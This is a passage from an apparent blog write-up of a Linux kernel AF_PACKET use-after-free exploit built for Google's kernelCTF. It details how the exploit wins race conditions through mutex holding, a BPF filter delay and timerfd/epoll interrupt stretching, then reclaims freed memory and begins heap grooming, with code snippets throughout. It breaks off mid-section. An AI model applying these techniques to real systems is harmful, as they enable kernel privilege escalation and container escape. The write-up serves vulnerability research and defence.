}</code></pre></div><p>The exploit pre-acquires pg_vec_lock by calling sendmsg() on the victim socket&#8217;s TX ring in a way that reaches wait_for_completion_interruptible_timeout(). This puts the thread to sleep for a configurable duration (set via SO_SNDTIMEO) while holding the mutex. Now packet_set_ring() blocks at mutex_lock(&amp;po-&gt;pg_vec_lock) for a <em>predictable, attacker-controlled</em> period &#8212; in this case, one full second.</p><p>This transforms a nanosecond-scale race window into a one-second window, making the first race essentially <strong>deterministic</strong>: there is ample time to bring the network interface UP and register the protocol hook.</p><p><strong>This pattern generalizes.</strong> When auditing kernel code for race conditions, look for:</p><ol><li><p>A sequence where lock A is released, work happens, then lock B is acquired</p></li><li><p>A separate code path that holds lock B and can sleep (mutexes allow sleeping; spinlocks do not)</p></li><li><p>A way to trigger that sleeping code path before the racing code path</p></li></ol><p>If all three conditions are met, the race window between releasing lock A and acquiring lock B becomes arbitrarily stretchable. Code that appeared &#8220;safe enough&#8221; because the window was tiny becomes trivially exploitable.</p><h2>The Exploit</h2><p>The exploit targets the kernelCTF mitigation-v4-6.6 environment &#8212; Google&#8217;s Container-Optimized OS (COS) with additional kernel security mitigations enabled, running Linux 6.6. It achieves full privilege escalation and container escape. It builds exploit primitives through four stages, each more powerful than the last, culminating in arbitrary kernel memory read/write and shellcode execution.</p><h3>Stage 0: Winning the Races</h3><h4>First Race: Deterministic via Mutex Barrier</h4><p>The &#8220;first race&#8221; isn&#8217;t really a traditional race where two threads sprint and one hopes to win by luck. The exploit <strong>eliminates the randomness entirely</strong> by converting it into a deterministic sequence using a mutex as a barrier.</p><p><strong>How tpacket_snd() holds pg_vec_lock while sleeping</strong></p><p>The exploit needs a way to hold the pg_vec_lock mutex for a controlled duration. It finds this in tpacket_snd(), the kernel&#8217;s TX path for packet sockets. Here&#8217;s the relevant code path:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;4239cb2b-b974-4d0e-b406-62c9c6074777&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">static int tpacket_snd(struct packet_sock *po, struct msghdr *msg)
{
    bool need_wait = !(msg-&gt;msg_flags &amp; MSG_DONTWAIT);  // [1] controllable

    mutex_lock(&amp;po-&gt;pg_vec_lock);                        // [2] grab the mutex

    // ... validate device is UP, etc ...

    do {
        ph = packet_current_frame(po, &amp;po-&gt;tx_ring, TP_STATUS_SEND_REQUEST);
        if (unlikely(ph == NULL)) {
            if (need_wait &amp;&amp; skb) {                      // [3] need skb != NULL
                timeo = sock_sndtimeo(&amp;po-&gt;sk, ...);    // from SO_SNDTIMEO
                timeo = wait_for_completion_interruptible_timeout(
                    &amp;po-&gt;skb_completion, timeo);         // [4] SLEEP here!
                if (timeo &lt;= 0) {
                    err = !timeo ? -ETIMEDOUT : -ERESTARTSYS;
                    goto out_put;
                }
            }
            continue;
        }

        skb = NULL;
        tp_len = tpacket_parse_header(po, ph, ...);     // [5] read from TX ring
        if (tp_len &lt; 0) goto tpacket_error;

        skb = sock_alloc_send_skb(&amp;po-&gt;sk, ...);        // [6] after this, skb != NULL

        tp_len = tpacket_fill_skb(po, skb, ...);        // [7] can force tp_len &lt; 0
        if (unlikely(tp_len &lt; 0)) {
tpacket_error:
            if (packet_sock_flag(po, PACKET_SOCK_TP_LOSS)) {  // [8]
                __packet_set_status(po, ph, TP_STATUS_AVAILABLE);
                packet_increment_head(&amp;po-&gt;tx_ring);
                kfree_skb(skb);
                continue;                                // [9] loop again!
            }
        }
        // ...
    } while (...);

out:
    mutex_unlock(&amp;po-&gt;pg_vec_lock);                      // [10] finally release
}</code></pre></div><p>The exploit navigates this code path as follows:</p><ol><li><p>Call sendmsg() <strong>without</strong> MSG_DONTWAIT, so need_wait = true.</p></li><li><p>The mutex is acquired at [2].</p></li><li><p>First loop iteration: a TX frame is found (the exploit pre-wrote TP_STATUS_SEND_REQUEST via mmap()). At [5], tpacket_parse_header() reads tp_len from the mmapped ring &#8212; the exploit set tp_len = 1, which is too small, causing tpacket_fill_skb() at [7] to return a negative error. But first, sock_alloc_send_skb() at [6] sets skb != NULL.</p></li><li><p>The PACKET_SOCK_TP_LOSS flag is set (via setsockopt(PACKET_LOSS)), so we hit [8] &#8594; [9] and continue back to the top of the loop.</p></li><li><p>Second loop iteration: no more frames with TP_STATUS_SEND_REQUEST, so ph == NULL. Now need_wait == true and skb != NULL (from the first iteration&#8217;s allocation), so we enter [3] &#8594; [4]: wait_for_completion_interruptible_timeout(). <strong>The thread sleeps for SO_SNDTIMEO duration (1 second) while holding pg_vec_lock.</strong></p></li></ol><p>There&#8217;s a subtlety: sock_alloc_send_skb() checks sk-&gt;sk_err and returns NULL if it&#8217;s set. When the interface goes DOWN, packet_notifier() sets sk-&gt;sk_err = ENETDOWN. Since the exploit needs the interface to be DOWN later for the bug trigger, it must ensure the interface is still UP when tpacket_snd() runs. The ordering matters.</p><p><strong>The deterministic sequence</strong></p><p><strong>Setup: the dummy interface and victim socket.</strong> The exploit runs inside a user namespace (for CAP_NET_RAW) and a network namespace (for a controlled network environment). It creates a dummy network interface named &#8220;pwn_dummy&#8221; via netlink (RTM_NEWLINK with IFLA_INFO_KIND = &#8220;dummy&#8221;), sets its MTU to IPV6_MIN_MTU - 1 (1279 bytes), and brings it UP via ioctl(SIOCSIFFLAGS, IFF_UP | IFF_RUNNING). A dummy interface is ideal because it&#8217;s a pure software device &#8212; packets sent to it are immediately looped back to the protocol handler, so the exploit doesn&#8217;t need any real hardware or network traffic.</p><p>The exploit then creates the <strong>victim packet socket</strong> &#8212; an AF_PACKET/SOCK_RAW socket bound to this dummy interface with sll_protocol = htons(ETH_P_ALL) (receive all protocol types). The socket is configured with TPACKET_V3 ring buffers (both TX and RX), PACKET_LOSS enabled, SO_SNDTIMEO set to 1 second, PACKET_RESERVE set to 38, and a 700-instruction BPF filter attached. The RX ring is the one that will be freed during the race; the TX ring provides the frame needed for the tpacket_snd() sleep trick. At this point, the victim socket is UP and actively receiving packets &#8212; the starting state needed for the exploit.</p><p><strong>Worker threads.</strong> The exploit creates three worker threads:</p><ul><li><p><strong>pg_vec_lock_thread</strong> (CPU 0, nice = 19 &#8212; lowest priority): Holds the mutex</p></li><li><p><strong>pg_vec_buffer_thread</strong> (CPU 0, normal priority): Runs packet_set_ring() to free the ring buffer</p></li><li><p><strong>tpacket_rcv_thread</strong> (CPU 1): Sends the packet that triggers the UAF</p></li></ul><p>The pg_vec_buffer_thread has higher priority than pg_vec_lock_thread on the same CPU. This is critical for the second race&#8217;s timing. Both threads are pinned to CPU 0, so only one can run at a time. When tpacket_snd() in pg_vec_lock_thread calls mutex_unlock(&amp;po-&gt;pg_vec_lock), the CFS (Completely Fair Scheduler) &#8212; Linux&#8217;s default process scheduler, which allocates CPU time proportionally based on priority &#8212; sees that the woken pg_vec_buffer_thread (nice=0) has higher priority than the running pg_vec_lock_thread (nice=19, the lowest possible priority) and <strong>immediately preempts</strong> it. This means packet_set_ring() resumes without delay &#8212; it frees the old ring buffer pages, and the same thread immediately reclaims them with alloc_pages(). This matters because over on CPU 1, tpacket_rcv() is frozen by the timer interrupt, and that freeze has a finite duration. The entire free-and-reclaim sequence on CPU 0 must complete before the interrupt returns on CPU 1. If pg_vec_lock_thread continued running after the mutex release (burning CPU 0 time on irrelevant cleanup), the reclamation might not finish in time &#8212; causing a NULL dereference crash instead of a controlled UAF.</p><p>The orchestration proceeds step by step:</p><p><strong>Step 1: Lock the mutex.</strong> Main thread sends work to pg_vec_lock_thread, which calls sendmsg() &#8594; enters tpacket_snd() &#8594; acquires po-&gt;pg_vec_lock &#8594; reaches wait_for_completion_interruptible_timeout() &#8594; sleeps. Main thread polls /proc/[tid]/stat until the thread state is S (sleeping), then records pg_vec_lock_acquire_time via clock_gettime(CLOCK_MONOTONIC).</p><p><strong>Step 2: Bring the interface DOWN.</strong> Main thread calls ioctl(SIOCSIFFLAGS) to set the interface DOWN. This triggers packet_notifier() with NETDEV_DOWN, which unhooks the victim socket (sets PACKET_SOCK_RUNNING = false). The socket is no longer running, but po-&gt;num is still non-zero.</p><p><strong>Step 3: Trigger packet_set_ring().</strong> Main thread sends work to pg_vec_buffer_thread, which calls setsockopt(PACKET_RX_RING, {tp_block_nr=0}). This enters the free path of packet_set_ring():</p><ul><li><p>spin_lock(&amp;po-&gt;bind_lock)</p></li><li><p>was_running = false (interface is DOWN)</p></li><li><p>num = po-&gt;num (non-zero &#8212; <strong>this is the bug</strong>)</p></li><li><p>if (was_running) is false &#8594; <strong>po-&gt;num is NOT zeroed</strong></p></li><li><p>spin_unlock(&amp;po-&gt;bind_lock) &#8212; the race window opens</p></li><li><p>synchronize_net() &#8212; brief wait</p></li><li><p>mutex_lock(&amp;po-&gt;pg_vec_lock) &#8212; <strong>BLOCKS</strong> because pg_vec_lock_thread holds it</p></li></ul><p>Main thread polls /proc/[tid]/stat until pg_vec_buffer_thread is sleeping. <strong>This confirms that packet_set_ring() has passed the vulnerable bind_lock section and is now blocked on the mutex.</strong></p><p><strong>Step 4: Bring the interface UP.</strong> Main thread calls ioctl(SIOCSIFFLAGS) to set the interface UP. This triggers packet_notifier() with NETDEV_UP:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;1f8e52f6-afc6-4b4c-9a2a-14c563c23bd9&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">case NETDEV_UP:
    spin_lock(&amp;po-&gt;bind_lock);
    if (po-&gt;num)                  // non-zero &#8212; the bug!
        register_prot_hook(sk);   // re-hooks the socket!
    spin_unlock(&amp;po-&gt;bind_lock);</code></pre></div><p><strong>The first race is won.</strong> The victim socket is now hooked to the interface again &#8212; it will receive packets via tpacket_rcv() &#8212; but packet_set_ring() is frozen at the mutex, waiting to free the old ring buffer. There was no race to win; the exploit verified each state transition before proceeding to the next.</p><h4>Second Race: Probabilistic but Enhanced with Three Timing Mechanisms</h4><p>After winning the first race, the exploit has achieved this state:</p><ul><li><p>The victim socket is <strong>hooked to the network interface</strong> (receiving packets via tpacket_rcv())</p></li><li><p>packet_set_ring() is <strong>frozen</strong>, blocked on po-&gt;pg_vec_lock held by the sleeping pg_vec_lock_thread</p></li><li><p>The pg_vec_lock_thread will wake up after exactly 1 second (the SO_SNDTIMEO timeout)</p></li></ul><p>When the timeout expires and pg_vec_lock_thread releases the mutex, packet_set_ring() resumes. Inside the pg_vec_lock critical section, it does two things: (1) swaps rb-&gt;pg_vec to NULL, and (2) <strong>changes the protocol hook function from tpacket_rcv to packet_rcv</strong>. After releasing the mutex, it calls free_pg_vec() to free the old ring buffer pages.</p><p>This hook change is what makes the second race necessary. Once packet_set_ring() switches the hook to packet_rcv, any <em>new</em> packet arriving at the socket will be dispatched to packet_rcv() instead of tpacket_rcv() &#8212; and packet_rcv() doesn&#8217;t use the ring buffer at all, so there&#8217;s no UAF. The exploit cannot simply wait until the ring buffer is freed and then send a packet; by that point, the hook has already been changed.</p><p>The only way to get tpacket_rcv() to access freed memory is to have it <strong>already dispatched</strong> before the hook is changed. The network stack resolves the hook function pointer at packet dispatch time. If a packet is sent to the interface and tpacket_rcv() is called <em>before</em> packet_set_ring() swaps the hook, then tpacket_rcv() will continue executing its code path &#8212; including accessing the ring buffer &#8212; regardless of what packet_set_ring() does afterward. The function is already on the call stack; the hook pointer swap only affects future packets.</p><p>So the second race is about getting tpacket_rcv() to be <strong>dispatched</strong> <em>before</em> packet_set_ring() changes the hook, and then having tpacket_rcv() dereference the ring buffer pages <em>after</em> packet_set_ring() has freed them. The exploit uses three independent timing mechanisms stacked together to hit this window.</p><p><strong>Mechanism 1: Calculated Sleep</strong></p><p>The exploit knows exactly when the mutex will be released:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;459a9715-9cec-45e1-8b29-b70f557e6efc&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">pg_vec_lock_release_time = pg_vec_lock_acquire_time + sndtimeo  // +1 second</code></pre></div><p>The tpacket_rcv_thread receives this timestamp and sleeps until just <strong>before</strong> the release:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;0074264e-c346-46ba-a45c-e2d8cdac0110&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// In tpacket_rcv_thread_fn:
struct timespec sleep_duration = timespec_sub(
    remaining_time_before_pg_vec_lock_release,
    work-&gt;decrease_tpacket_rcv_thread_sleep_time  // 5000 ns = 5&#956;s
);
syscall(SYS_nanosleep, &amp;sleep_duration, NULL);
syscall(SYS_sendmsg, trigger_sendmsg_packet_socket, work-&gt;msg, 0);</code></pre></div><p>The thread wakes up ~5 microseconds before the mutex releases and immediately sends the packet via packet_sendmsg_spkt() &#8212; chosen because it has the shortest code path from sendmsg() to dev_queue_xmit() to the protocol hook. The packet traverses the network stack and arrives at tpacket_rcv() on the victim socket.</p><p><strong>Mechanism 2: BPF Filter Delay</strong></p><p>A 700-instruction classic BPF filter is attached to the victim socket:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;b2003109-95a6-4a22-851f-82a2905b593e&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">struct sock_filter filter[700];
for (int i = 0; i &lt; 699; i++) {
    filter[i].code = BPF_LD | BPF_IMM;
    filter[i].k = 0xcafebabe;          // load immediate &#8212; cheap but not free
}
filter[699].code = BPF_RET | BPF_K;
filter[699].k = sizeof(size_t);        // return truncated length = 8 bytes</code></pre></div><p>When the packet arrives and tpacket_rcv() is invoked, it calls run_filter() early in its execution &#8212; <strong>before</strong> it ever touches pkc-&gt;pkbdq or any ring buffer pointer. The filter executes all 700 instructions, burning CPU time. During this window, CPU 0 is free to run packet_set_ring(), free the ring buffer, and reclaim it. The final BPF_RET instruction also serves a second purpose: it truncates the packet&#8217;s &#8220;snapshot length&#8221; to exactly 8 bytes (or sizeof(void *)) &#8212; the precise number of bytes the exploit wants to overwrite in the overflow target.</p><p><strong>Mechanism 3: Timer Interrupt Lengthening (Jann Horn&#8217;s Technique)</strong></p><p>The BPF filter alone buys only microseconds. The exploit needs to <strong>pause tpacket_rcv() on CPU 1 for much longer</strong> &#8212; long enough for packet_set_ring() on CPU 0 to not only free the ring buffer but also for the reclamation allocation to complete. This is where the timer interrupt technique comes in.</p><p><strong>Background: timerfd, epoll, and wait queues.</strong> The Linux timerfd_create() syscall creates a file descriptor that delivers timer expiration notifications. Internally, the kernel allocates a timerfd_ctx structure containing an hrtimer (high-resolution timer) and a wait_queue_head (wqh). When the timer fires, the kernel&#8217;s hrtimer interrupt handler calls timerfd_tmrproc(), which wakes up all waiters on wqh.</p><p>The epoll subsystem is how waiters get added to wqh. When you call epoll_ctl(EPOLL_CTL_ADD) to monitor a timerfd, the kernel calls ep_ptable_queue_proc(), which allocates a wait_queue_entry and adds it to the timerfd&#8217;s wqh via add_wait_queue(). Each epoll_ctl() call on a different file descriptor pointing to the same timerfd adds <strong>one more entry</strong> to this wait queue. So the key insight is: <strong>a single timerfd can accumulate an arbitrarily large wait queue by monitoring many dup()&#8217;d copies of it through epoll.</strong></p><p>When the timer fires, the interrupt handler must walk the entire wait queue under spin_lock_irqsave &#8212; meaning interrupts are disabled and the CPU cannot be preempted until every entry is processed. This turns the wait queue length into a <strong>controllable CPU stall duration</strong>.</p><p><strong>The file descriptor table constraint.</strong> In the kernelCTF environment, each process is limited to 4,096 file descriptors (RLIMIT_NOFILE). The exploit first raises rlim_cur to rlim_max (4,096) via setrlimit(). Even so, 4,096 wait queue entries isn&#8217;t enough to stall the CPU for the required duration. The exploit works around this by creating 180 threads, each with its own <strong>private file descriptor table</strong>:</p><p><em>Setup phase</em> &#8212; During initialization, the exploit creates 180 timerfd_waitlist_thread threads. Each thread:</p><ol><li><p>Is pinned to <strong>CPU 1</strong> (same CPU as tpacket_rcv_thread)</p></li><li><p>Calls unshare(CLONE_FILES) to get its own private file descriptor table &#8212; this is the key trick that multiplies the FD limit, since each thread now has its own independent table of 4,096 slots</p></li><li><p>Closes stdin, stdout, and stderr to free up three more slots</p></li><li><p>Creates an epollfd (uses one slot)</p></li><li><p>Calls dup(timerfd) in a loop until the FD table is full &#8212; the original timerfd (created by the main thread before unshare) is still accessible, and each dup() creates a new file descriptor pointing to the same underlying timerfd_ctx</p></li><li><p>Calls epoll_ctl(EPOLL_CTL_ADD) for each duplicated FD, adding a wait queue entry to the timerfd&#8217;s wqh for every one</p></li></ol><p>Each epoll_ctl() call adds a wait_queue_entry to the timerfd&#8217;s internal wait queue via ep_ptable_queue_proc() &#8594; add_wait_queue(). With 180 threads &#215; ~4,000 FDs each, the timerfd&#8217;s wait queue accumulates roughly <strong>720,000 entries</strong>.</p><p><em>Firing phase</em> &#8212; The exploit arms the timer from CPU 1 (important &#8212; timerfd_settime() binds the hrtimer to the calling CPU):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;e4a701e7-acf7-4212-a0f3-77298e6180bb&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">struct itimerspec settime_value = {};
settime_value.it_value = timespec_add(pg_vec_lock_release_time,
                                       timer_interrupt_amplitude);  // +150&#956;s
timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &amp;settime_value, NULL);</code></pre></div><p>When the timer fires on CPU 1, the kernel interrupt handler executes:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;f3c4920a-0d77-4247-abc1-4f4a18e72ec3&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">timerfd_tmrproc()
  &#8594; timerfd_triggered()
    &#8594; spin_lock_irqsave(&amp;ctx-&gt;wqh.lock, flags)   // interrupts disabled!
    &#8594; wake_up_locked_poll()
      &#8594; __wake_up_common()                         // walks the waitqueue
        &#8594; list_for_each_entry_safe_from(...)       // 720,000 entries!
          &#8594; ep_poll_callback()                     // called for each entry
    &#8594; spin_unlock_irqrestore(...)</code></pre></div><p>The __wake_up_common() function iterates through all 720,000 wait queue entries, calling ep_poll_callback() for each one. This entire loop runs inside spin_lock_irqsave &#8212; meaning <strong>interrupts are disabled and preemption is impossible</strong>. If tpacket_rcv() was executing on CPU 1 when the interrupt fired, it is <strong>completely frozen</strong> until the interrupt handler finishes walking the entire list. This takes hundreds of microseconds to milliseconds &#8212; more than enough time for packet_set_ring() on CPU 0 to free the ring buffer and for pg_vec_buffer_thread to reclaim it with a new ring buffer.</p><p>The exploit retries this entire sequence if the race is lost (detected by checking whether the overflow actually corrupted the target object). In practice, the combination of precise sleep timing, BPF filter delay, and the massive timer interrupt provides a high success rate.</p><h3>Stage 1: Page Overflow Primitive (via xattr corruption)</h3><p>After winning both races, the exploit needs to turn the UAF into something useful. This stage has three parts: reclaiming the freed ring buffer to prevent a kernel panic, arranging the heap so the reclaimed buffer is adjacent to a victim object, and engineering a precise overflow that corrupts exactly the right field.</p><h4>Part 1: Reclaiming the freed pgv array</h4><p>The key challenge is that free_pg_vec() zeroes out all buffer pointers in the pgv array after freeing it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;6ec2e036-cb47-4b11-9fb4-2ac8bef15d1f&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">static void free_pg_vec(struct pgv *pg_vec, unsigned int order, unsigned int len)
{
    for (i = 0; i &lt; len; i++) {
        if (pg_vec[i].buffer) {
            free_pages((unsigned long)pg_vec[i].buffer, order);
            pg_vec[i].buffer = NULL;  // zeroed!
        }
    }
    kfree(pg_vec);
}</code></pre></div><p>If tpacket_rcv() reads a zeroed buffer pointer, it dereferences NULL and the kernel panics. The exploit must <strong>reclaim</strong> the freed pgv array &#8212; replace it in memory with a new pgv array containing valid buffer pointers &#8212; before tpacket_rcv() gets past the BPF filter, the timer interrupt and accesses it.</p><p>This is handled by pg_vec_buffer_thread, which runs on CPU 0 alongside packet_set_ring(). Immediately after packet_set_ring() frees the victim&#8217;s ring buffer, the same thread allocates a new TX ring buffer on a different packet socket:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;2a70493e-9a0e-4568-a08f-d29d642dc334&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// In pg_vec_buffer_thread_fn:
// Step 1: Free victim RX ring
setsockopt(victim_fd, SOL_PACKET, PACKET_RX_RING, &amp;free_req, sizeof(free_req));
// Step 2: Immediately reclaim with a new TX ring
alloc_pages(reclaim_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16, PAGES_ORDER2_SIZE);</code></pre></div><p>The alloc_pages() function used throughout the exploit is a helper that allocates kernel pages by creating a TX ring buffer on a packet socket. It calls setsockopt(PACKET_TX_RING) with the specified block count and block size, which triggers packet_set_ring() &#8594; alloc_pg_vec() in the kernel &#8212; allocating both a pgv array and the requested number of page blocks. The corresponding free_pages() helper calls setsockopt(PACKET_TX_RING) with all-zero parameters, triggering the free path. This gives the exploit precise control over kernel page allocations and frees through a simple userspace API: each packet socket can hold one TX ring, and creating or destroying that ring allocates or frees pages of the exact size the exploit needs.</p><p>The reclamation ring has the <strong>same number of blocks</strong> as the victim (2 blocks &#8212; MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16 = 2) so the pgv array is the same size: kcalloc(2, sizeof(struct pgv)) = kcalloc(2, 8) = 16 bytes. The size match is essential because of the two heap mitigations.</p><p>CONFIG_RANDOM_KMALLOC_CACHES selects the slab cache by hashing the <strong>call site</strong> address &#8212; both pgv arrays are allocated by the same kcalloc() inside alloc_pg_vec(), so they hash to the same random cache. But this only works if they&#8217;re also in the <strong>same size class</strong>: if the reclamation used 4 blocks (32 bytes &#8594; kmalloc-32) instead of 2 blocks (16 bytes &#8594; kmalloc-16), it would go to a different slab cache entirely. CONFIG_SLAB_VIRTUAL enforces that each slab cache gets a dedicated virtual address range &#8212; a freed kmalloc-16 slot can only be reused by another kmalloc-16 allocation. Same call site + same size = guaranteed same slab cache = the new pgv array lands on the exact memory the old one occupied.</p><p>The following diagram shows the pgv array through its three states &#8212; before free, after free (zeroed, dangerous), and after reclamation (new blocks, smaller size). The stale pkc-&gt;pkbdq pointer references the same memory address throughout:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!CIRL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!CIRL!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 424w, https://substackcdn.com/image/fetch/$s_!CIRL!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 848w, https://substackcdn.com/image/fetch/$s_!CIRL!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 1272w, https://substackcdn.com/image/fetch/$s_!CIRL!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!CIRL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png" width="1456" height="931" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:931,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:367575,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/189789999?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!CIRL!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 424w, https://substackcdn.com/image/fetch/$s_!CIRL!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 848w, https://substackcdn.com/image/fetch/$s_!CIRL!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 1272w, https://substackcdn.com/image/fetch/$s_!CIRL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Before reclamation, the stale pointer would find NULLs and the kernel would crash. After reclamation it finds valid pointers &#8212; but to <strong>smaller</strong> 16 KB blocks instead of the original 32 KB blocks. This size mismatch is what enables the overflow: the stale kblk_size = 32768 makes tpacket_rcv() believe each block is 32 KB, but the actual blocks are only 16 KB, so writes beyond 16 KB spill into adjacent memory.</p><h4>Part 2: Heap grooming for page layout</h4><p>The exploit needs to achieve two things through heap grooming:</p><ol><li><p><strong>Force tpacket_rcv() to advance past block 0 to block 1.</strong> Block 0&#8217;s stale nxt_offset points into the old freed 32KB page &#8212; writing there would be uncontrolled. Block 1 gets a fresh nxt_offset via prb_open_block() that points into an actual reclaimed page.</p></li><li><p><strong>Ensure block 1 of the reclamation ring is physically adjacent to a simple_xattr.</strong> The overflow from block 1 must spill into a victim object, not into random memory.</p></li></ol><p>To force the block 1 path, the exploit needs curr &gt; end in __packet_lookup_frame_in_block(). This means the stale nxt_offset (from old block 0) must be at a <strong>higher</strong> address than new_block_0 + 32768. To ensure adjacency, the reclamation ring&#8217;s blocks must land in a region densely packed with simple_xattr objects. The exploit achieves both through a carefully staged allocation sequence:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;6c7bdbde-9a1d-4bd2-babc-f222a79cfebb&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Phase 1: Drain the page allocator
